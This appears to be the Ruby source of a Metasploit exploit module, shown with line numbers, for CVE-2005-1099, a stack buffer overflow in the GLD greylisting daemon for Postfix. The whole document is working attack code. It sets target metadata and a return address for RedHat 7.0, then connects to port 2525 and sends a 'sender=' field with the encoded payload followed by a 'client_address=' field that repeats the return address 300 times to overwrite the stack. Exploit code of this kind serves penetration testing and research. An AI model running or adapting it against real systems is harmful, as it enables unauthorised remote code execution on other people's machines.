Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'		=> 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
14
      'Description'	=> %q{
15
        This module exploits a stack buffer overflow in the Salim Gasmi
16
        GLD <= 1.4 greylisting daemon for Postfix. By sending an
17
        overly long string the stack can be overwritten.
18
      },
19
      'Author'	=> [ 'aushack' ],
20
      'Arch'		=> ARCH_X86,
21
      'Platform'	=> 'linux',
22
      'References'	=>
23
        [
24
          [ 'CVE', '2005-1099' ],
25
          [ 'OSVDB', '15492' ],
26
          [ 'BID', '13129' ],
27
          [ 'EDB', '934' ]
28
        ],
29
      'Privileged'	=> true,
30
      'License'	=> MSF_LICENSE,
31
      'Payload'	=>
32
        {
33
          'Space' => 1000,
34
          'BadChars' => "\x00\x0a\x0d\x20=",
35
          'StackAdjustment' => -3500,
36
        },
37
      'Targets'	=>
38
        [
39
          [ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
40
        ],
41
      'DefaultTarget'	=> 0,
42
      'DisclosureDate'  => '2005-04-12'
43
    ))
44

45
    register_options(
46
      [
47
        Opt::RPORT(2525)
48
      ],
49
      self.class
50
    )
51
  end
52

53
  def exploit
54
    connect
55

56
    sploit = "sender="+ payload.encoded + "\r\n"
57
    sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"
58

59
    sock.put(sploit)
60
    handler
61
    disconnect
62

63
  end
64
end
65

66